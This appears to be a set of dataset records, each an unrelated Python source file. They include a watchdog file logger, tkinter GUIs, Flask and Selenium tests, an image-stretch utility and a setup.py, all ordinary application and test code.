received modified event - % s.\" % event.src_path) \n \n elif event.event_type == 'moved' and event.src_path != logFile and event.src_path != script:\n # Event is received, you can process it now\n csv.writer(open(logFile, mode='a+', newline=''), delimiter=',').writerow([datetime.date(datetime.now()), datetime.time(datetime.now()),event.event_type, event.src_path])\n print(\"Watchdog received moved event - %s.\" % event.src_path)\n \n elif event.event_type == 'deleted' and event.src_path != logFile and event.src_path != script:\n # Event is deleted, you can process it now \n csv.writer(open(logFile, mode='a+', newline=''), delimiter=',').writerow([datetime.date(datetime.now()), datetime.time(datetime.now()),event.event_type, event.src_path]) \n print(\"Watchdog received deleted event - %s.\" % event.src_path)\n\n\ndef checkpoint():\n if(os.path.isfile(\"./running.txt\")):\n f = open(\"running.txt\", \"r\")\n pid = int(f.readline())\n f.close()\n\n if psutil.pid_exists(pid):\n psutil.Process(pid).terminate()\n os.remove(\"running.txt\")\n else:\n os.remove(\"running.txt\")\n else:\n pass\n\n f = open(\"running.txt\",\"w\")\n pid = str(os.getpid())\n f.write(pid)\n f.close()\n\n\ndef main():\n checkpoint()\n\n paths = ''\n\n fr = open(\"config.txt\", \"r\")\n path = fr.readline()\n length = len(path)\n\n index = 1\n for i in range(length):\n if index == length:\n break\n else:\n paths += path[i]\n index += 1\n\n if 
os.path.isfile(\"D:\\LogFile.csv\") == False:\n csv.writer(open(\"D:\\LogFile.csv\", mode='w', newline=''), delimiter=',')\n\n try:\n watch = OnMyWatch() \n watch.run(paths)\n\n except FileNotFoundError:\n print('There\\'s no such directory')\n except ValueError:\n print('Input the right PATH')\n except OSError:\n print('Input the right PATH') \n\n\nif __name__ == '__main__':\n # test = input(\"HELLO : \")\n main()\n # exit1 = input(\"Press enter to exit....\" )\n\n","sub_path":"script.pyw","file_name":"script.pyw","file_ext":"pyw","file_size_in_byte":4567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"293050425","text":"\r\nfrom tkinter import *\r\nfrom tkinter import messagebox\r\n\r\n\r\nroot = Tk()\r\nroot.geometry('600x400+200+100')\r\nroot.title(\"Самый лучший генератор\")\r\nbackgroundColor = \"#555\"\r\nroot.background = backgroundColor\r\n\r\n\"\"\"Метка FROM начало\"\"\"\r\nlabel_from = Label(text=\"FROM\", fg=\"#00ff00\", bg=\"#555\")\r\nlabel_from.place(x=10,y=10)\r\n\r\nt_from = Text(height=1,width=15, fg=\"#00ff00\", bg=\"#555\")\r\nt_from.place(x=65, y=10)\r\n\"\"\"Метка FROM конец\"\"\"\r\n\r\n\"\"\"Метка TO начало\"\"\"\r\nlabel_from = Label(text=\"TO\", fg=\"#00ff00\", bg=\"#555\")\r\nlabel_from.place(x=10,y=55)\r\n\r\nt_to = Text(height=1,width=15, fg=\"#00ff00\", bg=\"#555\")\r\nt_to.place(x=65, y=55)\r\n\"\"\"Метка TO конец\"\"\"\r\n\r\n\"\"\"Метка COUNT начало\"\"\"\r\nlabel_count = Label(text=\"COUNT\", fg=\"#00ff00\", bg=\"#555\")\r\nlabel_count.place(x=10,y=100)\r\n\r\nt_count = Text(height=1,width=15, fg=\"#00ff00\", bg=\"#555\")\r\nt_count.place(x=65, y=100)\r\n\"\"\"Метка COUNT конец\"\"\"\r\n\r\n\"\"\"Вывод наших чисел начало\"\"\"\r\nt_numbers = Text(height=5, width=60, fg=\"#00ff00\", bg=\"#555\")\r\nt_numbers.place(x=10,y=200)\r\nt_numbers.config(state=DISABLED)\r\n\"\"\"Вывод наших чисел конец\"\"\"\r\n\r\n\"\"\"Кннопка CLEAR начало\"\"\"\r\ndef ClickClear(event):\r\n t_numbers.config(state=NORMAL)\r\n t_numbers.delete('1.0',END)\r\n t_from.delete('1.0', END)\r\n t_to.delete('1.0', END)\r\n t_count.delete('1.0', END)\r\n t_numbers.config(state=DISABLED)\r\n\r\nclear = Button(text=\"CLEAR\", bg=\"#555\", fg=\"#00ff00\", padx=\"15\", pady=\"6\", font=\"15\")\r\nclear.bind(\"\", ClickClear)\r\nclear.place(x=200, y=150)\r\n\"\"\"Кннопка CLEAR конец\"\"\"\r\n\r\n\"\"\"Кннопка GENERATE начало\"\"\"\r\nfrom random import randint\r\n\r\ndef ClickGen(event1):\r\n t_numbers.config(state=NORMAL)\r\n t_numbers.delete('1.0', END)\r\n if len(t_from.get(1.0, END)) > 8 or len(t_to.get(1.0, END)) > 8:\r\n messagebox.showinfo(\"Ошибка\", \"Вводите чичла поменьше\")\r\n sys.exit()\r\n else:\r\n if len(t_count.get(1.0, END)) > 4:\r\n messagebox.showinfo(\"Ошибка\", \"Вводите чичла поменьше\")\r\n sys.exit()\r\n else:\r\n if re.match(\"^[0-9 ]+$\", t_from.get(1.0, END)) and re.match(\"^[0-9 ]+$\", t_to.get(1.0, END)):\r\n if re.match(\"^[0-9 ]+$\", t_count.get(1.0, END)):\r\n if int(t_from.get(1.0, END))>int(t_to.get(1.0, END)):\r\n messagebox.showinfo(\"Ошибка\", \"Введите числа от меньшего к большему\")\r\n t_from.delete('1.0', END)\r\n t_to.delete('1.0', END)\r\n t_count.delete('1.0', END)\r\n else:\r\n ch1 = int(t_from.get(1.0, END))\r\n ch2 = int(t_to.get(1.0, END))\r\n\r\n i=0\r\n c=int(t_count.get(1.0, END))\r\n vivod = \"\"\r\n\r\n while i < c:\r\n rez = randint(ch1, ch2)\r\n vivod=vivod+str(rez)+\" \"\r\n i = i+1\r\n t_numbers.insert(1.0, vivod)\r\n t_numbers.config(state=DISABLED)\r\n else:\r\n 
messagebox.showinfo(\"Ошибка\", \"Вводите только числа >0\")\r\n else:\r\n messagebox.showinfo(\"Ошибка\", \"Вводите только числа >0\")\r\n\r\n\r\ngen = Button(text=\"GENERATE\", bg=\"#555\", fg=\"#00ff00\", padx=\"15\", pady=\"6\", font=\"15\")\r\ngen.bind(\"\", ClickGen)\r\ngen.place(x=10, y=150)\r\n\"\"\"Кннопка GENERATE конец\"\"\"\r\n\r\nroot.mainloop()","sub_path":"gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":3801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"416412214","text":"from PySide2 import QtCore, QtWidgets, QtGui\nimport traceback\nfrom MiWidget import MiWidget\nfrom RestfulApiClient import RestfulApiClient\n\nclass PmWidget(QtWidgets.QWidget):\n def __init__(self, parent=None):\n super().__init__(parent)\n self.__initUi()\n\n\n def __initUi(self):\n try:\n # initialize the nav tree\n self.windowTitle = \"UI\"\n self.navTree = QtWidgets.QTreeWidget()\n self.navTree.setMaximumWidth(240)\n self.navTree.setHeaderHidden(True)\n self.miWidget = MiWidget()\n layout = QtWidgets.QHBoxLayout(self)\n layout.setSpacing(2)\n layout.addWidget(self.navTree)\n layout.addWidget(self.miWidget)\n with open(\"./qss/PmWidget.qss\", \"rb\") as f:\n self.setStyleSheet(f.read().decode())\n self.__updateData()\n self.navTree.expandAll()\n self.navTree.itemClicked.connect(self.onClickItem)\n except Exception as e:\n print(e)\n\n\n def __updateData(self):\n try:\n self.navTree.clear()\n self.navTree.setHeaderLabel(\"\")\n result = RestfulApiClient().QueryPms()\n if not result:return\n if result.get(\"query_pms_result\", {}).get(\"result\") != \"success\":return\n \n for p, ms in result[\"query_pms_result\"][\"detail\"].items():\n parItem = QtWidgets.QTreeWidgetItem(self.navTree, [p, ])\n for m in ms:\n childItem = QtWidgets.QTreeWidgetItem(parItem, [m, ])\n except Exception as e:\n print(e)\n\n\n def onClickItem(self, item, col):\n try:\n parItem = item.parent()\n if not parItem:return\n result = RestfulApiClient().QueryMi(parItem.text(0), item.text(0))\n if not result:return\n if result.get(\"query_mi_result\", {}).get(\"result\") != 'success':\n print(result)\n return\n self.miWidget.Update(parItem.text(0), item.text(0), result[\"query_mi_result\"][\"detail\"])\n except Exception as e:\n print(e)","sub_path":"example/PrjUi/PmWidget.py","file_name":"PmWidget.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"16804390","text":"import sys\nfrom setuptools import find_namespace_packages, setup\nimport codecs\nimport os.path\n\n# edit author dictionary as necessary\nauthor_dict = {\n \"Joseph D. Hughes\": \"jdhughes@usgs.gov\",\n \"Martijn Russcher\": \"Martijn.Russcher@deltares.nl\",\n \"Christian D. 
Langevin\": \"langevin@usgs.gov\",\n \"Julian Hofer\": \"Julian.Hofer@deltares.nl\",\n}\n__author__ = \", \".join(author_dict.keys())\n__author_email__ = \", \".join(s for _, s in author_dict.items())\n\n\ndef read(rel_path):\n here = os.path.abspath(os.path.dirname(__file__))\n with codecs.open(os.path.join(here, rel_path), \"r\") as fp:\n return fp.read()\n\n\ndef get_version(rel_path):\n for line in read(rel_path).splitlines():\n if line.startswith(\"__version__\"):\n delim = '\"' if '\"' in line else \"'\"\n return line.split(delim)[1]\n else:\n raise RuntimeError(\"Unable to find version string.\")\n\n\nlong_description = read(\"README.md\")\n\n\nsetup(\n name=\"modflowapi\",\n description=\"modflowapi is an extension to the xmipy Python package.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n author=__author__,\n author_email=__author_email__,\n url=\"https://github.com/MODFLOW-USGS/modflowapi.git\",\n license=\"CC0\",\n platforms=\"Windows, Mac OS-X, Linux\",\n install_requires=[\n \"xmipy\",\n ],\n python_requires=\">=3.6\",\n packages=find_namespace_packages(exclude=(\"etc\",)),\n version=get_version(\"modflowapi/__init__.py\"),\n classifiers=[\"Topic :: Scientific/Engineering :: Hydrology\"],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"237892910","text":"import unittest\nfrom telnetlib import EC\n\nfrom selenium.webdriver import ActionChains\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.wait import WebDriverWait\n\nfrom selenium import webdriver\nimport time\n\nfrom selenium.webdriver.support.wait import WebDriverWait\n\nfrom utils.config import DATA_PATH\nfrom utils.file_reader import ExcelReader\n\n\nclass TestTouzinny(unittest.TestCase):\n excel = DATA_PATH + '/investamount.xlsx'\n user=DATA_PATH+'/investuser1.xlsx'\n bidd=DATA_PATH+'/investbidd.xlsx'\n def test_touzinny(self):\n datas = ExcelReader (self.excel).data\n tzusers=ExcelReader(self.user).data\n tzbidds=ExcelReader(self.bidd).data\n for d in datas:\n with self.subTest (data=d):\n\n for u in tzusers:\n driver = webdriver.Chrome ()\n driver.get ('http://192.168.1.249:9901/hkjf/index.do?method=getIndexPage')\n WebDriverWait (driver, 10).until (EC.presence_of_element_located ((By.ID, 'login')))\n with self.subTest(tzuser=u):\n driver.find_element_by_id ('login').send_keys (int(u['user']))\n time.sleep(1)\n e1 = driver.find_element_by_xpath (\".//*[@id='txt2']\")\n action = ActionChains (driver)\n action.move_to_element (e1).click ().send_keys (\"2971055a690ad019e9fc08a9971080ccfd6a8b588c69acc28383a12d9cfdcb135a60550a4df643b9967c5fab90ce4eb8e3970c2c093fefe299662ac44e868763d281e8708ab625528d55c6a777b2700bcb9daf7e7e0c6805ffd13760d4ac0120d6f43c2dc05fc38fcff485eedd8859d79200ddb7a9a606b8548fa1d8def1dacc\").perform ()\n\n driver.find_element_by_xpath(\".//*[@id='logindiv']/div/div[2]\").submit()\n for b in tzbidds:\n with self.subTest (tzbidd=b):\n # address=(\"http://192.168.1.249:9901/hkjf/investControllerFront.do?method=detail&code=ed791706-92f7-4435-b6f6-aa944ed87f4c\")\n ad1 = \"http://192.168.1.249:9901/hkjf/investControllerFront.do?method=detail&code=\"\n ad2 = b['bidd_code']\n add = ad1 + ad2\n driver.get(add)\n time.sleep(1)\n # driver.find_element_by_id (\"projectCode\").send_keys (d['title'])\n 
driver.find_element_by_id(\"amount\").send_keys(int(d['amount']))\n driver.find_element_by_link_text(\"立即投资\").click()\n time.sleep(3)\n #sreach_window=driver.current_window_handle\n #driver.find_element_by_xpath(\".//*[@id='PDF9hFVQpC']/div[1]/div[3]/input[1]\").click()\n driver.find_element_by_class_name(\"dialogBtn\").click()\n #input class=\"dialogBtn\" type=\"button\" value=\"确定\"\n\n\n\n\nif __name__ == \"__main__\":\n unittest.main ()\n\n\n\n\n","sub_path":"testjf_UI/pc_case/test_tznny.py","file_name":"test_tznny.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"356454736","text":"import rasterio\nimport numpy\nimport os, sys\nimport subprocess\n\ncircle = sys.argv[1]\nsquare = sys.argv[2]\n\ndef imgTest(img1, img2):\n\n with rasterio.drivers():\n\n with rasterio.open(img1) as src:\n r, g, b = map(src.read_band, (1, 2, 3))\n\n with rasterio.open(img2) as sec:\n r2, g2, b2 = map(sec.read_band, (1,2,3))\n\n kwargs = src.meta\n kwargs.update(\n dtype=rasterio.uint8,\n count=3,\n compress='lzw')\n\n r3 = numpy.absolute(r2 - r)\n g3 = numpy.absolute(g2 - g)\n b3 = numpy.absolute(b2 - b)\n\n with rasterio.open('data/example-diff.png', 'w', **kwargs) as dst:\n dst.write_band(1, r3)\n dst.write_band(2, g3)\n dst.write_band(3, b3)\n\n # info = subprocess.check_output(\n # ['gdalinfo', '-stats', 'data/example-diff.tif'])\n subprocess.call(['open', 'data/example-diff.png'])\n\nimgTest(circle, square)\n","sub_path":"scripts/imgDiff.py","file_name":"imgDiff.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"118146314","text":"class Solution(object):\n def nextLargerNodes(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: List[int]\n \"\"\"\n result = list() # 结果使用\n index = 0\n pair = (0, head[0])\n stack = list() # 当作栈使用\n stack.append(pair)\n i = 1\n while i < len(head):\n while stack and head[i] > stack[-1][1]:\n result.insert(stack[-1][0], head[i])\n stack.pop()\n pair = (i, head[i])\n stack.append(pair)\n i += 1\n while stack:\n result.insert(stack[-1][0], 0)\n stack.pop()\n return result\n \n\n \n\n\nx = Solution()\nprint(x.nextLargerNodes([1,7,5,1,9,2,5,1]))","sub_path":"1019.py","file_name":"1019.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"584934339","text":"import matplotlib.pyplot as plt\nimport logging as log\nlog.basicConfig(level=log.DEBUG)\nlog.debug('this is a demo massage')\n\n\ndef zoom_factory(ax, base_scale=1.5):\n prex = 0\n prey = 0\n prexdata = 0\n preydata = 0\n\n def zoom_fun(event):\n nonlocal prex, prey, prexdata, preydata\n curx = event.x\n cury = event.y\n\n # if not changed mouse position(or changed so little)\n # remain the pre scale center\n if abs(curx - prex) < 10 and abs(cury - prey) < 10:\n # remain same\n xdata = prexdata\n ydata = preydata\n # if changed mouse position ,also change the cur scale center\n else:\n # change\n xdata = event.xdata # get event x location\n ydata = event.ydata # get event y location\n\n # update previous location data\n prex = event.x\n prey = event.y\n prexdata = xdata\n preydata = ydata\n\n # get the current x and y limits\n cur_xlim = ax.get_xlim()\n cur_ylim = ax.get_ylim()\n\n cur_xrange = (cur_xlim[1] - cur_xlim[0]) * .5\n cur_yrange = (cur_ylim[1] - cur_ylim[0]) * .5\n\n # log.debug((xdata, ydata))\n if event.button == 
'up':\n # deal with zoom in\n scale_factor = 1 / base_scale\n elif event.button == 'down':\n # deal with zoom out\n scale_factor = base_scale\n else:\n # deal with something that should never happen\n scale_factor = 1\n print(event.button)\n # set new limits\n ax.set_xlim([\n xdata - cur_xrange * scale_factor,\n xdata + cur_xrange * scale_factor\n ])\n ax.set_ylim([\n ydata - cur_yrange * scale_factor,\n ydata + cur_yrange * scale_factor\n ])\n plt.draw() # force re-draw\n\n fig = ax.get_figure() # get the figure of interest\n # attach the call back\n fig.canvas.mpl_connect('scroll_event', zoom_fun)\n\n # return the function\n return zoom_fun\n\n\nfig, ax = plt.subplots(1, 1)\n\nax.plot(range(10))\nscale = 1.1\nf = zoom_factory(ax, base_scale=scale)\n\nfig.show()\n","sub_path":"bin/clara/plotutility.py","file_name":"plotutility.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"9343630","text":"from tkinter import ttk\nfrom tkinter import *\nfrom tkinter.ttk import *\n\nclass Bridger(Frame):\n def addData(self):pass\n\nclass VisList():\n def addLines(self): pass\n def removeLine(self): pass\n\n# Sorted listbox visual list\nclass SortVisList(Listbox, VisList):\n def __init__(self, frame ):\n super().__init__(frame)\n\n # sort into alphabetical order\n def addLines(self, prodlist):\n # sort array alphabetically\n self.prods = self.sortUpwards( prodlist)\n for prod in self.prods:\n self.insert(END, prod.name)\n\n # sort the data alphabetically\n def sortUpwards(self, prodlist):\n self.prodList = prodlist\n prods = []\n # Copy array for sorting\n for prod in self.prodList:\n prods.append(prod)\n\n for i in range(0, len(prods)):\n for j in range(i, len(prods)):\n if (prods[i].name > prods[j].name):\n ptemp = prods[i]\n prods[i] = prods[j]\n prods[j] = ptemp\n return prods # return sorted\n\n# Listbox visual list\nclass LbVisList(Listbox, VisList):\n def __init__(self, frame ):\n super().__init__(frame)\n\n def addLines(self, prodlist):\n for prod in prodlist:\n self.insert(END, prod.getName())\n\n# Treelist (table) visual list\nclass TbVisList(Treeview, VisList) :\n def __init__(self, frame ):\n super().__init__(frame)\n self[\"columns\"] = (\"quantity\")\n self.column(\"#0\", width=150, minwidth=100, stretch=NO)\n self.column(\"quantity\", width=50, minwidth=50, stretch=NO)\n\n self.heading('#0', text='Part')\n self.heading('quantity', text='Qty')\n\n self.index = 0\n\n def addLines(self, prodlist):\n for prod in prodlist:\n self.insert(\"\", self.index, text=prod.name,\n values=(prod.count))\n self.index += 1\n\n\n# General bridge between data any any VisList class\nclass ListBridge(Bridger):\n def __init__(self, frame, vislist):\n self.list = vislist\n self.list.pack()\n\n # adds the list of Products into any VisList\n def addData(self, products):\n #for prod in products:\n self.list.addLines( products)\n\n# represents one product: name and quantity\nclass Product():\n def __init__(self, nstring):\n # splits the string into two parts\n strings =nstring.split(\"--\") # at the dashes\n self.name = strings[0].strip()\n self.count= strings[1].strip()\n\n\n# creates an array of Product objects\nclass Products():\n def read(self, fname):\n with open (fname) as self.fobj:\n self.contents = self.fobj.readlines()\n i = 0\n self._products=[]\n for line in self.contents:\n prod = Product(line)\n self._products.append(prod)\n\n # returns the array of Products\n def getProducts(self) :\n return 
self._products\n\n# creates the user interface\nclass BuildUI():\n def build(self):\n root = Tk()\n root.geometry(\"335x200\") # this one is pretty confusing\n root.title(\"Parts list\") # title only shows if window is wide enough\n prod = Products()\n prod.read( \"products.txt\")\n\n # creates the left frame\n self.lframe = Frame(root, width=200, borderwidth=2,relief=GROOVE)\n self.leftlabel = Label(self.lframe, text=\"Customer view\")\n self.leftlabel.pack(fill=X)\n\n #self.vislist = LbVisList(self.lframe)\n self.vislist = SortVisList(self.lframe)\n self.lbridge = ListBridge(self.lframe, self.vislist)\n self.lbridge.addData(prod.getProducts())\n self.lframe.grid(row=0, column=0, sticky=NW)\n\n # creates the right frame\n self.rframe = Frame(root, borderwidth=2,relief=GROOVE)\n self.rframe.grid(row=0, column=1, sticky=E)\n self.rlabel = Label(self.rframe, text=\"Executive view\")\n self.rlabel.pack(fill=X)\n\n # right frame contains a table\n # managed by the TbVisliat class\n self.rvislist = TbVisList(self.rframe)\n self.rlb = ListBridge( self.rframe, self.rvislist)\n self.rlb.addData(prod.getProducts())\n#----------------------------------\ndef main():\n BuildUI().build()\n mainloop()\n\n### Here we go ####\nif __name__== \"__main__\":\n main()","sub_path":"Pythonpatterns/13. Bridge/SortBridge.py","file_name":"SortBridge.py","file_ext":"py","file_size_in_byte":4315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"189502286","text":"from astropy.io import fits\nimport numpy as np\nimport time\n\"\"\"\nThis product is based on software from the PixInsight project, developed by\nPleiades Astrophoto and its contributors (http://pixinsight.com/).\n\"\"\"\n\nclass Stretch:\n\n def __init__(self, target_bkg=0.25, shadows_clip=-1.25):\n self.shadows_clip = shadows_clip\n self.target_bkg = target_bkg\n\n def _get_avg_dev(self, data, median):\n \"\"\"Return the average deviation from the median.\n\n Args:\n data (np.array): array of floats, presumably the image data\n \"\"\"\n #median = np.median(data)\n n = data.size\n #gutime=time.time()\n #median_deviation = lambda x: abs(x - median)\n #avg_dev = np.sum( median_deviation(data) / n )\n #avg_dev = np.mean( median_deviation(data))\n #avg_dev = np.mean(np.absolute(data-median))\n avg_dev = np.sum( np.absolute(data-median) / n )\n #print (\"guttime: \" + str(time.time() - gutime))\n \n return avg_dev\n\n\n def _mtf(self, m, x):\n \"\"\"Midtones Transfer Function\n\n MTF(m, x) = {\n 0 for x == 0,\n 1/2 for x == m,\n 1 for x == 1,\n\n (m - 1)x\n -------------- otherwise.\n (2m - 1)x - m\n }\n\n See the section \"Midtones Balance\" from\n https://pixinsight.com/doc/tools/HistogramTransformation/HistogramTransformation.html\n\n Args:\n m (float): midtones balance parameter\n a value below 0.5 darkens the midtones\n a value above 0.5 lightens the midtones\n x (np.array): the data that we want to copy and transform.\n \"\"\"\n #googtime=time.time()\n shape = x.shape\n #breakpoint()\n #x = x.flatten()\n x = x.ravel()\n \n zeros = x==0\n halfs = x==m\n ones = x==1\n others = np.logical_xor((x==x), (zeros + halfs + ones))\n\n x[zeros] = 0\n x[halfs] = 0.5\n x[ones] = 1\n x[others] = (m - 1) * x[others] / ((((2 * m) - 1) * x[others]) - m)\n #print (\"time: \" + str(time.time()-googtime))\n return x.reshape(shape)\n\n\n def _get_stretch_parameters(self, data):\n \"\"\" Get the stretch parameters automatically.\n m (float) is the midtones balance\n c0 (float) is the shadows clipping point\n c1 (float) is 
the highlights clipping point\n \"\"\"\n \n median = np.median(data.ravel())\n \n avg_dev = self._get_avg_dev(data, median)\n \n\n c0 = np.clip(median + (self.shadows_clip * avg_dev), 0, 1)\n m = self._mtf(self.target_bkg, median - c0)\n\n\n return {\n \"c0\": c0,\n #\"c1\": 1,\n \"m\": m\n }\n\n\n def stretch(self, data):\n \"\"\" Stretch the image.\n\n Args:\n data (np.array): the original image data array.\n\n Returns:\n np.array: the stretched image data\n \"\"\"\n #googtime=time.time()\n # Normalize the data\n try:\n data = data / np.max(data)\n except:\n data = data #NB this avoids div by 0 is image is a very flat bias\n\n #data=data/np.max(data)\n\n # Obtain the stretch parameters\n stretch_params = self._get_stretch_parameters(data)\n m = stretch_params[\"m\"]\n c0 = stretch_params[\"c0\"]\n #c1 = stretch_params[\"c1\"]\n\n # Selectors for pixels that lie below or above the shadows clipping point\n #below = data < c0\n above = data >= c0\n\n # Clip everything below the shadows clipping point\n data[data < c0] = 0\n #googtime=time.time()\n # For the rest of the pixels: apply the midtones transfer function\n data[above] = self._mtf(m, (data[above] - c0)/(1 - c0))\n #print (\"time: \" + str(time.time()-googtime))\n return data\n\n","sub_path":"subprocesses/auto_stretch/stretch.py","file_name":"stretch.py","file_ext":"py","file_size_in_byte":3933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"305698383","text":"import datetime\n\nimport flask_testing\nfrom sqlalchemy.exc import IntegrityError\n\nfrom monolith.app import create_app\nfrom monolith.database import User, db, Follower\nfrom monolith.forms import LoginForm\nfrom monolith.urls import TEST_DB\n\n\nclass TestTemplateStories(flask_testing.TestCase):\n app = None\n\n # First thing called\n def create_app(self):\n global app\n app = create_app(database=TEST_DB)\n return app\n\n # Set up database for testing here\n def setUp(self) -> None:\n print(\"SET UP\")\n with app.app_context():\n example = User()\n example.firstname = 'Admin'\n example.lastname = 'Admin'\n example.email = 'example@example.com'\n example.dateofbirth = datetime.datetime(2020, 10, 5)\n example.is_admin = True\n example.set_password('admin')\n db.session.add(example)\n\n example2 = User()\n example2.firstname = 'Admin'\n example2.lastname = 'Admin'\n example2.email = 'example2@example2.com'\n example2.dateofbirth = datetime.datetime(2020, 10, 5)\n example2.is_admin = True\n example2.set_password('admin')\n db.session.add(example2)\n\n db.session.commit()\n\n payload = {'email': 'example@example.com',\n 'password': 'admin'}\n\n form = LoginForm(data=payload)\n\n self.client.post('/users/login', data=form.data, follow_redirects=True)\n\n # Executed at end of each test\n def tearDown(self) -> None:\n print(\"TEAR DOWN\")\n db.session.remove()\n db.drop_all()\n\n def test_login_required(self):\n response = self.client.post('/users/logout')\n # Log out success\n self.assert_redirects(response, '/')\n response = self.client.post('/users/{}/follow'.format(2), follow_redirects=True)\n self.assert401(response, 'You must login to follow')\n\n response = self.client.post('/users/{}/unfollow'.format(2), follow_redirects=True)\n self.assert401(response, 'You must login to unfollow')\n\n # FOLLOW\n\n def test_follow(self):\n self.client.post('/users/{}/follow'.format(2), follow_redirects=True)\n self.assert_template_used('wall.html')\n self.assert_message_flashed('Followed')\n\n def test_redirect_follow(self):\n 
response = self.client.post('/users/{}/follow'.format(2))\n self.assert_redirects(response, '/users/{}'.format(2))\n\n def test_already_follow(self):\n self.client.post('/users/{}/follow'.format(2), follow_redirects=True)\n self.client.post('/users/{}/follow'.format(2), follow_redirects=True)\n self.assert_template_used('wall.html')\n self.assert_message_flashed('You already follow this storyteller')\n\n def test_follow_yourself(self):\n self.client.post('/users/{}/follow'.format(1), follow_redirects=True)\n self.assert_template_used('wall.html')\n self.assert_message_flashed(\"You can't follow yourself\")\n\n def test_follow_storyteller_no_exit(self):\n self.client.post('/users/{}/follow'.format(7), follow_redirects=True)\n self.assert_template_used('wall.html')\n self.assert_message_flashed(\"Storyteller doesn't exist\")\n\n # UNFOLLOW\n\n def test_unfollow(self):\n self.client.post('/users/{}/follow'.format(2))\n self.client.post('/users/{}/unfollow'.format(2), follow_redirects=True)\n self.assert_template_used('wall.html')\n self.assert_message_flashed('Unfollowed')\n\n def test_redirect_unfollow(self):\n response = self.client.post('/users/{}/unfollow'.format(2))\n self.assert_redirects(response, '/users/{}'.format(2))\n\n def test_follow_first_to_unfollow(self):\n self.client.post('/users/{}/unfollow'.format(2), follow_redirects=True)\n self.assert_template_used('wall.html')\n self.assert_message_flashed('You should follow him first')\n\n def test_unfollow_yourself(self):\n self.client.post('/users/{}/unfollow'.format(1), follow_redirects=True)\n self.assert_template_used('wall.html')\n self.assert_message_flashed(\"You can't unfollow yourself\")\n\n def test_unfollow_storyteller_no_exist(self):\n self.client.post('/users/{}/unfollow'.format(7), follow_redirects=True)\n self.assert_template_used('wall.html')\n self.assert_message_flashed(\"Storyteller doesn't exist\")\n\n # DB CONSTRAINTS\n\n def test_only_positive_follower_counter(self):\n with self.assertRaises(IntegrityError):\n db.session.query(User).filter_by(id=1).update({'follower_counter': -1})\n\n def test_db_constraint_follow_yourself(self):\n with self.assertRaises(IntegrityError):\n follower = Follower()\n follower.followed_id = 1\n follower.follower_id = 1\n db.session.add(follower)\n db.session.commit()\n\n # TEST FOLLOWERS\n # Testing followers of non existing user\n def test_followers(self):\n self.client.get('/users/{}/followers'.format(7), follow_redirects=True)\n self.assert_template_used('wall.html')\n self.assert_message_flashed(\"Storyteller doesn't exist\")\n\n # Testing followers of existing user\n def test_followers2(self):\n self.client.get('/users/{}/followers'.format(1), follow_redirects=True)\n self.assert_template_used('followers.html')\n","sub_path":"monolith/views/tests/test_follow_unfollow.py","file_name":"test_follow_unfollow.py","file_ext":"py","file_size_in_byte":5404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"438347654","text":"from unittest.mock import patch\n\nimport pandas as pd\nimport yfinance as yf\n\nfrom trading_scripts.utils.helpers import (\n close_open_buy_orders,\n get_account,\n get_historical_data,\n get_last_quote,\n get_position_symbols,\n get_positions,\n get_trailing_stop_orders,\n is_market_open,\n validate_env_vars,\n)\n\n\ndef test_close_open_buy_orders(mocker, mock_orders):\n orders_list = mock_orders.copy()\n\n def get_buy_orders(*args, **kwargs):\n buy_orders = []\n for order in orders_list:\n if order.side == 
\"buy\":\n buy_orders.append(order)\n return buy_orders\n\n def cancel_order_side_effect(id):\n i = 0\n for order in orders_list:\n if order.id == id:\n del orders_list[i]\n i += 1\n return None\n\n # patches\n mocker.patch(\n \"trading_scripts.utils.helpers.Cache.API_CLIENT.list_orders\",\n side_effect=get_buy_orders,\n )\n mocker.patch(\n \"trading_scripts.utils.helpers.Cache.API_CLIENT.cancel_order\",\n side_effect=cancel_order_side_effect,\n )\n\n assert len(get_buy_orders()) == 1\n close_open_buy_orders()\n assert len(get_buy_orders()) == 0\n\n\ndef test_close_open_buy_orders_exception(mocker, mock_orders):\n orders_list = mock_orders.copy()\n\n def get_buy_orders(*args, **kwargs):\n buy_orders = []\n for order in orders_list:\n if order.side == \"buy\":\n buy_orders.append(order)\n return buy_orders\n\n def cancel_order_side_effect(*args, **kwargs):\n raise Exception(\"test exception\")\n\n # patches\n mocker.patch(\n \"trading_scripts.utils.helpers.Cache.API_CLIENT.list_orders\",\n side_effect=get_buy_orders,\n )\n mocker.patch(\n \"trading_scripts.utils.helpers.Cache.API_CLIENT.cancel_order\",\n side_effect=cancel_order_side_effect,\n )\n\n mocked_logger_error = mocker.patch(\"loguru.logger.error\")\n assert len(get_buy_orders()) == 1\n close_open_buy_orders()\n assert len(get_buy_orders()) == 1\n mocked_logger_error.assert_called_once()\n\n\ndef test_get_positions(mocker, mock_positions):\n # patches\n mocker.patch(\n \"trading_scripts.utils.helpers.Cache.API_CLIENT.list_positions\",\n return_value=mock_positions,\n )\n\n positions = get_positions()\n assert isinstance(positions, 